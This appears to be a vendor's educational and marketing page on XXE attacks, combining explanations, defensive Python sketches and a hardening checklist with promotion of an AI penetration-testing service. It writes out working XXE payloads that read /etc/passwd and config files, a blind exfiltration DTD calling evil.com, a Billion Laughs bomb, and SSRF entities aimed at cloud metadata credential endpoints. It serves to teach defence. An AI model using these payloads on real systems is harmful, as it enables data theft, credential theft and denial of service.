XML External Entity (XXE) Testing
Your XML Parser Just Read Your Password File.

Here is something that might surprise you: that innocent-looking XML file your application just processed? It could have instructed your server to read /etc/passwd, scan your internal network, or even crash your entire system. An XML External Entity attack does not need a sophisticated exploit. Just a few lines of XML and a misconfigured parser. The scary part? Most developers have never even heard of it.

* Run an instant security penetration test on your domain.

THE PROBLEM

Is Your Application Blindly Trusting XML Input?

Let me ask you something. Your application accepts XML data, maybe from an API, a file upload, or a SOAP web service. You validate the schema. You check that the fields make sense. You feel pretty good about your input validation. But here is the thing: you are probably not validating the most dangerous part of XML.

The Document Type Definition (DTD) sits at the top of an XML file, and it can contain entity declarations that point to external resources. When your parser processes these entities, it obediently fetches whatever they point to. A local file. An internal URL. A deeply nested structure that consumes all your memory. This is the XML External Entity (XXE) attack, and your parser is doing exactly what it was told to do.

The vulnerability was serious enough that it had its own category in the OWASP Top 10 2017 before being merged into Security Misconfiguration in 2021. It affects applications built in Java, .NET, PHP, Python, and nearly every other language with XML parsing capabilities.

Think your application is immune?

PentestMate's AI agents find these flaws in 87% of the apps we test.

WHAT WE HUNT

What Our AI Agents Look For

Unlike automated scanners that look for code signatures, our agents understand your business logic and test it like a real attacker would.

Classic File Disclosure

CRITICAL

The attacker defines an external entity pointing to a local file like /etc/passwd or application configuration files. When the XML is parsed, the file contents are included in the response, exposing sensitive data.

Server-Side Request Forgery via XXE

CRITICAL

Instead of reading local files, the attacker points entities to internal URLs. This turns your server into a proxy, allowing them to scan internal networks, access cloud metadata endpoints, or hit internal APIs.

Billion Laughs DoS Attack

HIGH

Also known as an XML bomb, this attack uses nested entity references that expand exponentially. A few kilobytes of XML can expand to gigabytes in memory, crashing your application or server.

Blind XXE with Out-of-Band Exfiltration

CRITICAL

When the application returns neither the entity contents nor useful error messages, attackers use parameter entities to exfiltrate data through DNS lookups or HTTP requests to their own server. The data leaves your network without appearing in any response.

XXE via Modified Content Types

HIGH

Applications that accept JSON sometimes also accept XML when the Content-Type header is changed. Attackers send XML payloads to JSON endpoints, exploiting hidden XML parser functionality.

XXE in Document Processors

MEDIUM

Office documents (DOCX, XLSX) and SVG images are XML-based. Applications that process these files can be vulnerable to XXE when the XML content is parsed without proper security configuration.

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

OWASP Foundation (XXE Prevention Cheat Sheet)
DEEP DIVE

Understanding the XML External Entity (XXE) Attack in Depth

XXE is one of those vulnerabilities that looks almost too simple to be dangerous. But simplicity is exactly what makes it so effective. Let me walk you through exactly how these attacks work and why they are so hard to catch without specialized testing.

The Classic XXE: Reading System Files

This is the textbook XML External Entity attack. The attacker submits an XML document with a custom DTD that defines an entity pointing to a local file. When your parser encounters the entity reference, it reads the file and includes its contents in the document.

classic-xxe-file-disclosure.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

<!-- The parser reads /etc/passwd and substitutes it for &xxe; -->

<!-- Server response might include: -->
<foo>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...</foo>

<!-- Attacker now has your system users list -->
<!-- Next targets: /etc/shadow, application config files,
     database credentials, API keys... -->

This works because many XML parsers, particularly older versions and legacy configurations, resolve external entities by default. The parser is not broken; it is doing exactly what the XML specification allows. The vulnerability is in trusting user-controlled XML without disabling dangerous features.
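One way to act on this is to refuse any DTD before the document reaches application code. The sketch below is a minimal Python illustration using the standard library's expat bindings. The names `DTDForbidden` and `reject_doctype` are hypothetical, and a real deployment would more likely rely on a hardened library or the parser's own settings.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Parse xml_bytes and raise DTDForbidden at the first DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at the start of the DOCTYPE, before any entity
        # declared inside it can be expanded.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


# The classic file-disclosure payload from above, as bytes.
payload = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<foo>&xxe;</foo>"
)

try:
    reject_doctype(payload)
    verdict = "accepted"
except DTDForbidden:
    verdict = "rejected"

print(verdict)
```

Rejecting the whole DOCTYPE is stricter than disabling external entities alone, and it only suits applications that never need a DTD.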

Blind XXE: Exfiltrating Data When You Cannot See Responses

What if the application does not return the XML content in its response? Attackers use a technique called out-of-band (OOB) exfiltration. They host a malicious DTD on their server and use parameter entities to send your data to themselves.

blind-xxe-oob-exfiltration.xml
<!-- Attacker hosts this DTD on their server: evil.com/xxe.dtd -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?data=%file;'>">
%eval;
%exfil;

<!-- Payload sent to vulnerable application -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">
  %xxe;
]>
<foo>test</foo>

<!-- What happens: -->
<!-- 1. Parser fetches the DTD from attacker's server -->
<!-- 2. DTD reads /etc/hostname into %file -->
<!-- 3. %eval constructs an entity that makes HTTP request -->
<!-- 4. %exfil sends the file contents to attacker's server -->

<!-- Attacker's server log shows: -->
<!-- GET /?data=production-web-server-01 HTTP/1.1 -->
<!-- Data exfiltrated - no visible response to victim -->

Blind XXE is particularly dangerous because there is no indication in the application response that anything went wrong. The data silently leaves your network. PentestMate deploys callback servers to detect these attacks by monitoring for out-of-band connections.
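On the receiving side, an out-of-band hit is just an HTTP request whose query string carries the leaked value. As a rough Python sketch, a callback server's log line could be decoded like this. The function name `extract_exfiltrated` is hypothetical, and the `data` parameter simply follows the example above.

```python
from urllib.parse import parse_qs, urlsplit


def extract_exfiltrated(request_line, param="data"):
    """Return the values of `param` found in an HTTP request line."""
    parts = request_line.split()
    if len(parts) != 3:
        return []  # not a "METHOD target VERSION" line
    _method, target, _version = parts
    query = urlsplit(target).query
    return parse_qs(query).get(param, [])


leaked = extract_exfiltrated("GET /?data=production-web-server-01 HTTP/1.1")
print(leaked)
```

Any request that arrives at a unique callback URL is already evidence that the parser fetched an external resource, whether or not it carries data.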

The Billion Laughs Attack: XML Bomb Denial of Service

This attack, documented on Wikipedia, uses exponentially expanding entities to consume all available memory. A 1KB XML file can expand to several gigabytes, crashing your application or bringing down the entire server.

billion-laughs-xml-bomb.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

<!-- Each level expands 10x the previous level -->
<!-- lol9 references lol8 ten times -->
<!-- lol8 references lol7 ten times, and so on -->

<!-- Result: 10^9 = 1,000,000,000 "lol" strings -->
<!-- Original: ~1KB XML -->
<!-- Expanded: ~3GB in memory -->
<!-- Outcome: Application crash, potential server crash -->

This attack does not even require network access or external entities. It uses only internal entities, making it harder to block with simple firewall rules. Proper parser configuration is the only reliable defense.
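The growth is easy to check by hand: each level that repeats the previous entity ten times multiplies the output by ten. Here is a small Python sketch of that arithmetic. The function `expanded_size` is illustrative, and it counts only the raw expanded text, not parser overhead.

```python
def expanded_size(levels, fanout=10, base="lol"):
    """Bytes of text produced when `levels` nested entities each
    repeat the previous one `fanout` times, starting from `base`."""
    return len(base.encode("utf-8")) * fanout ** levels


for levels in (8, 9):
    size = expanded_size(levels)
    print(f"{levels} levels -> {size:,} bytes")
```

Eight tenfold levels come to 300,000,000 bytes and nine come to 3,000,000,000, so a single extra line in the payload is the difference between roughly 300 MB and roughly 3 GB.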

XXE via Content-Type Confusion

Here is something most developers do not realize: some frameworks that accept JSON will also parse XML if you change the Content-Type header, depending on which parsers or message converters are enabled. That JSON API you thought was safe? An attacker can send XML and trigger XXE vulnerabilities you did not know existed.

content-type-xxe-attack.http
// Normal JSON request to your API
POST /api/user HTTP/1.1
Content-Type: application/json

{"username": "john", "email": "john@example.com"}

// Attacker's XXE attempt via Content-Type manipulation
POST /api/user HTTP/1.1
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///app/config/database.yml">
]>
<user>
  <username>&xxe;</username>
  <email>attacker@evil.com</email>
</user>

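// If your stack selects a parser from the Content-Type header:
// - Express.js with an XML body-parsing middleware registered alongside JSON
// - Spring with both JSON and XML message converters enabled
// - Other frameworks that negotiate request formats automatically
// the XML is parsed and, if the parser resolves external entities, XXE is triggered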

// Your JSON validation never runs
// XML parser processes the malicious DTD
// Database credentials now in attacker's hands

This is why PentestMate tests every endpoint with multiple content types. Your application might be processing XML in places you never intended.
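On the defensive side, an endpoint that is meant to speak JSON can refuse everything else before any body parser runs. The following is a minimal, framework-neutral Python sketch. The names `ALLOWED_MEDIA_TYPES` and `is_allowed_content_type` are hypothetical, and the single-entry allowlist is an assumption about the endpoint.

```python
ALLOWED_MEDIA_TYPES = {"application/json"}  # assumption: a JSON-only endpoint


def is_allowed_content_type(header_value):
    """True only if the media type (parameters ignored) is allowlisted."""
    if not header_value:
        return False
    # "application/json; charset=utf-8" -> "application/json"
    media_type = header_value.split(";", 1)[0].strip().lower()
    return media_type in ALLOWED_MEDIA_TYPES


for value in ("application/json; charset=utf-8", "application/xml", "text/xml", None):
    print(value, "->", is_allowed_content_type(value))
```

A check like this belongs in front of content negotiation, so that a request with an unexpected media type is rejected (typically with HTTP 415) instead of being routed to an XML parser.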

XXE in File Uploads: Weaponizing Documents

Office documents (DOCX, XLSX, PPTX) are actually ZIP archives containing XML files, and SVG images are plain XML. If your application extracts and processes these files without securing the XML parser, attackers can embed XXE payloads inside seemingly innocent documents.

document-xxe-attacks.sh
# Office documents (DOCX, XLSX, PPTX) are ZIP files
# containing XML content

$ unzip -l resume.docx
Archive:  resume.docx
  Length     Name
---------  ----
     1312  [Content_Types].xml
      590  _rels/.rels
     2156  word/document.xml    # Main document content
      817  word/_rels/document.xml.rels
     2456  word/styles.xml

# Attacker modifies word/document.xml:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<document>
  <body>
    <p>Dear Hiring Manager,</p>
    <p>&xxe;</p>  <!-- XXE payload -->
  </body>
</document>

# SVG images are also XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///app/.env">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&xxe;</text>
</svg>

# When your document processor or image resizer
# parses these, XXE is triggered

If your application processes document uploads, image conversions, or any file format that contains XML internally, you need to ensure every XML parser in your processing pipeline has external entities disabled.
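As an illustration of an upload pre-check, the Python sketch below opens a ZIP-based document in memory and flags any XML part that declares a DOCTYPE, since legitimate Office parts normally do not carry one. The helper names are hypothetical. The sketch reads each member fully into memory, so a real pipeline would also need size limits against oversized or compressed-bomb archives.

```python
import io
import zipfile
import xml.parsers.expat


class _DoctypeFound(Exception):
    pass


def _has_doctype(xml_bytes):
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise _DoctypeFound

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except _DoctypeFound:
        return True
    except xml.parsers.expat.ExpatError:
        # Malformed XML is treated as suspicious in this sketch.
        return True
    return False


def suspicious_members(archive_bytes):
    """Names of XML parts that declare a DOCTYPE or fail to parse."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            if name.endswith((".xml", ".rels")) and _has_doctype(archive.read(name)):
                flagged.append(name)
    return flagged


# Build a tiny stand-in for a tampered DOCX entirely in memory.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as docx:
    docx.writestr("[Content_Types].xml", "<Types/>")
    docx.writestr(
        "word/document.xml",
        '<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        "<document>&xxe;</document>",
    )

flagged = suspicious_members(buffer.getvalue())
print(flagged)
```

A scan like this complements, but does not replace, disabling external entities in the parser that ultimately processes the document.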

SSRF via XXE: Scanning Your Internal Network

When an attacker cannot read local files (maybe file:// URLs are blocked), they can still use XXE to make HTTP requests to internal services. This turns your server into a proxy for attacking your own infrastructure.

xxe-ssrf-internal-scanning.xml
<!-- Using XXE to scan internal network -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://192.168.1.1:8080/">
]>
<foo>&xxe;</foo>

<!-- If the port is open, the response might include HTML content -->
<!-- If closed, the error message or response time reveals that -->

<!-- Scanning for internal services: -->
<!ENTITY xxe SYSTEM "http://internal-admin.company.local/">
<!ENTITY xxe SYSTEM "http://10.0.0.5:9200/"> <!-- Elasticsearch -->
<!ENTITY xxe SYSTEM "http://10.0.0.6:6379/"> <!-- Redis -->
<!ENTITY xxe SYSTEM "http://localhost:8500/v1/agent/self"> <!-- Consul -->

<!-- Cloud metadata endpoints are prime targets: -->
<!-- AWS -->
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

<!-- GCP -->
<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/">

<!-- Azure -->
<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance">

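<!-- These endpoints can expose instance credentials, API tokens,
     and configuration. GCP and Azure require a custom request header
     and AWS IMDSv2 requires a session token, which a plain XXE fetch
     cannot supply; endpoints still reachable without them (such as
     AWS IMDSv1) are the ones at risk -->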

XXE-based SSRF is particularly dangerous in cloud environments. Access to the metadata endpoint can provide temporary credentials with significant privileges. Combined with other vulnerabilities, this can lead to complete infrastructure compromise.
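When reviewing logged payloads or writing a detection rule, it helps to classify the system identifiers that entities point to. The Python sketch below flags URLs whose host is a loopback, private, or link-local address, or carries an internal-looking name. The function `is_internal_target` and the suffix list are assumptions for illustration. It does not resolve DNS names, so it will miss public names that resolve to internal addresses.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: adjust these suffixes to your own internal naming scheme.
INTERNAL_SUFFIXES = (".internal", ".local", ".localhost")


def is_internal_target(url):
    """True if the URL's host looks like an internal network target."""
    host = (urlsplit(url).hostname or "").lower()
    if not host:
        return False  # e.g. file:// URLs carry no network host
    if host == "localhost" or host.endswith(INTERNAL_SUFFIXES):
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # a public-looking name; resolving it is out of scope
    return address.is_private or address.is_loopback or address.is_link_local


for url in (
    "http://192.168.1.1:8080/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://metadata.google.internal/computeMetadata/v1/",
    "http://evil.com/xxe.dtd",
):
    print(url, "->", is_internal_target(url))
```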

Still reading? Good. That means you care about security.

Most people would've clicked away by now. Let PentestMate find out if your application has these vulnerabilities - before someone else does.

HOW PENTESTMATE HELPS

Stop Reading About Vulnerabilities.
Start Finding Them.

Everything you have read above? Our AI agents test for all of it - automatically, continuously, and without you lifting a finger.

Comprehensive Parser Testing

Our AI agents test XML endpoints with multiple attack vectors, including classic file disclosure, blind XXE with OOB callbacks, and entity expansion attacks. We test what your parser actually does, not what you think it does.

Continuous XXE Monitoring

New XML processing code can introduce XXE vulnerabilities at any time. PentestMate continuously tests your endpoints, catching misconfigurations before attackers do.

Out-of-Band Detection

For blind XXE vulnerabilities where data does not appear in responses, we deploy callback servers that detect when your parser makes external connections, proving the vulnerability exists.

See It In Action

Start with a $1 trial - full access to all PentestMate AI-powered security testing

SECURITY CHECKLIST

Quick XXE Security Checklist

Use this as a starting point. If you're missing even one of these, you have a problem.

Parser Configuration

  • Disable external entity processing completely
  • Disable DTD processing if not required
  • Use hardened libraries such as defusedxml (Python) where available
  • Configure entity expansion limits
  • Disable XInclude processing
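As one concrete reading of the first checklist item, the Python sketch below configures a standard-library SAX parser with external general and parameter entities switched off. The names `TextCollector` and `parse_without_external_entities` are hypothetical. This setting alone does not limit internal entity expansion, so it is not a defense against the Billion Laughs attack.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes


class TextCollector(ContentHandler):
    """Accumulates character data so the caller can inspect it."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_without_external_entities(xml_bytes):
    parser = xml.sax.make_parser()
    # Recent Python versions already default to this; setting the
    # features explicitly documents the intent and guards older setups.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


text = parse_without_external_entities(b"<foo>hello</foo>")
print(text)
```

Other languages expose equivalent switches under different names, so the checklist items map to parser-specific settings rather than one universal flag.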

Input Validation

  • Validate Content-Type headers strictly
  • Reject unexpected XML in JSON endpoints
  • Sanitize XML before processing
  • Implement allowlist for expected XML structure
  • Log and alert on DTD declarations in input

File Upload Security

  • Scan document uploads for XXE payloads
  • Configure document processors securely
  • Validate SVG and other XML-based images
  • Use isolated environments for processing
  • Strip or regenerate document metadata

Defense in Depth

  • Block outbound connections from XML parsers
  • Restrict file system access for parser processes
  • Monitor for unusual DNS lookups
  • Implement network segmentation
  • Use WAF rules for common XXE patterns

Not sure if your system passes all these checks? Let PentestMate's AI agents find out for you.

REAL INCIDENTS

Real-World XXE Incidents

These aren't hypotheticals. These are documented cases of the exact vulnerabilities we've discussed:

Documented XXE Attack Vectors

According to OWASP, XXE can lead to file disclosure, SSRF, denial of service, and in some configurations, remote code execution.

What happened: XML External Entity vulnerabilities have been found in major enterprise software, including Java-based applications, .NET frameworks, and document processing systems.

Lesson: The vulnerability is not theoretical. It had its own category in OWASP Top 10 2017 (A4) before being merged into Security Misconfiguration (A05) in 2021. Source: OWASP Foundation

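Jolokia reloadByURL XXE

Attackers could reload logging configurations from external URLs, potentially leading to arbitrary file reads and SSRF.

What happened: The Jolokia JMX-HTTP bridge exposed a reloadByURL action, provided by the Logback JMX configurator, that loaded XML configuration from an attacker-supplied URL and allowed external entities to be processed.

Lesson: Even management APIs can expose XXE through the components they bridge to. The fix required disabling external entity processing in the XML parser. Note that the NVD entry for CVE-2018-1000130, which is often cited alongside this issue, describes a JNDI injection in Jolokia's proxy mode and not XXE itself. Source: Acunetix and NVD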

GET STARTED IN 2 MINUTES

Is Your XML Parser Exposing Your Infrastructure?

Every XML endpoint, SOAP service, file upload, and document processor is a potential XXE attack surface. Our AI agents probe your parsers with classic file disclosure payloads, blind XXE with callback detection, and entity expansion attacks. We find the XML processing vulnerabilities hiding in your application before attackers use them to read your configuration files, scan your network, or crash your servers.


3-day trial for just $1
Cancel anytime
Full vulnerability report
